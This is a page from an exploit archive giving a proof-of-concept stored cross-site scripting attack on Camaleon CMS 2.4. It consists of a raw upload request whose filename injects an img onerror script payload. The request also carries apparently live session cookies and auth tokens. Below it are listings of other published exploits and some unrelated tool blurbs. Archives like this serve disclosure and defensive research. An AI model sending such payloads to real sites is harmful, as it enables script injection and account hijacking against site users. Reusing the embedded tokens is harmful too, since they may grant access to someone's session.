Menu

Search for hundreds of thousands of exploits

"CAMALEON CMS 2.4 - Cross-Site Scripting"

Author

Exploit author

"Ismail Tasdelen"

Platform

Exploit platform

ruby

Release date

Exploit published date

2018-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Exploit Title: CAMALEON CMS 2.4 - Cross-Site Scripting
# Date: 2018-10-11 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://camaleon.tuzitio.com/
# Software Link : https://github.com/owen2345/camaleon-cms
# Software : CAMALEON CMS
# Version : 2.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
 
# HTTP POST Request :
 
POST /admin/media/upload?actions=false HTTP/1.1
Host: demo-7728.tuzitio.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo-7728.tuzitio.com/admin/profile/edit
X-CSRF-Token: D4mT8cg18Rxhpi7fYr9kRRvdCn2dSZXJMbbFeyOynVVMa3aD1pbIXDebhV3B2YwRttvYyoRLRWNf5gGlqX6fNw==
X-Requested-With: XMLHttpRequest
Content-Length: 1575324
Content-Type: multipart/form-data; boundary=---------------------------85707368319206533892056530265
Cookie: _ga=GA1.2.1784268591.1539231194; _gid=GA1.2.1333106602.1539231194; _tuzitio2_session=RHhIbzhHZTlERjFnM3ZUOTFzMnE5c295TCtVQ0QrUmttVGpCZnljaS9ibVM4UE9Ma0VDR2ppcnQzdlNPZFNobUsxdFhNSER4Z3JXYlBxN3VZcTNEbWRXS0ZldERyLzYyQ3d0S3hwSjhzWjBUMHJmaU1WeEt6MDB2QlQ0S0xkbGhUdkNwUHIrRS81ekJ3T2NnOUdnVXB5KzhPS1BnczNvaUtia2x6bmE3N2pzckRPaWI2Skc1RGhJWnZMbERRREZCSXpkU3pxdTMrRlk5WG5XYUMydk9xb1NRY2lzeWt2TWpwVjNodXJNOHFDZG9yczZXVkFMMXU2KzBZSTVqUGNkcDdjV3dBbmFuOVF3Z3BRRlFLcjFtcjVhK3hpak51VUFScVg3czQ0Z2xoOTg9LS1rczBEeWJsaDJPRkhwaTU3UHFSa2h3PT0%3D--f896a698dc0ad774de6bc953d2b9e460e916300f; auth_token=2ysW1sleUvjMJnzIqwlXag&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0&176.41.2.45
Connection: close

-----------------------------85707368319206533892056530265
Content-Disposition: form-data; name="file_upload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gitlab 12.9.0 - Arbitrary File Read (Authenticated)" webapps ruby "Jasper Rasenberg"
2020-07-26 "Rails 5.0.1 - Remote Code Execution" webapps ruby "Lucas Amorim"
2020-05-06 "GitLab 12.9.0 - Arbitrary File Read" webapps ruby KouroshRZ
2018-10-15 "AlchemyCMS 4.1 - Cross-Site Scripting" webapps ruby "Ismail Tasdelen"
2018-10-12 "CAMALEON CMS 2.4 - Cross-Site Scripting" webapps ruby "Ismail Tasdelen"
2018-05-02 "Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)" remote ruby Metasploit
2018-05-02 "Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)" remote ruby Metasploit
2017-12-02 "Ruby < 2.2.8 / < 2.3.5 / < 2.4.2 / < 2.5.0-preview1 - 'NET::Ftp' Command Injection" local ruby "Etienne Stalmans"
2017-08-30 "Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery" webapps ruby "Dhiraj Mishra"
2017-03-15 "GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution" webapps ruby iblue
Release Date Title Type Platform Author
2020-04-23 "Library CMS Powerful Book Management System 2.2.0 - Session Fixation" webapps php "Ismail Tasdelen"
2020-01-31 "FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)" webapps php "Ismail Tasdelen"
2020-01-17 "GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-17 "APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-16 "Tautulli 2.1.9 - Denial of Service ( Metasploit )" webapps multiple "Ismail Tasdelen"
2020-01-15 "Huawei HG255 - Directory Traversal ( Metasploit )" webapps hardware "Ismail Tasdelen"
2020-01-14 "IBM RICOH InfoPrint 6500 Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2020-01-14 "IBM RICOH 6400 Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2020-01-13 "SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-13 "SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-13 "Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-13 "TaskCanvas 1.4.0 - 'Registration' Denial Of Service" dos windows "Ismail Tasdelen"
2020-01-06 "Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)" webapps php "Ismail Tasdelen"
2020-01-06 "NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "SpotIM 2.2 - 'Name' Denial Of Service" dos windows "Ismail Tasdelen"
2020-01-06 "SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service" dos windows "Ismail Tasdelen"
2020-01-06 "NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "SpotIE 2.9.5 - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)" dos windows "Ismail Tasdelen"
2020-01-06 "IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.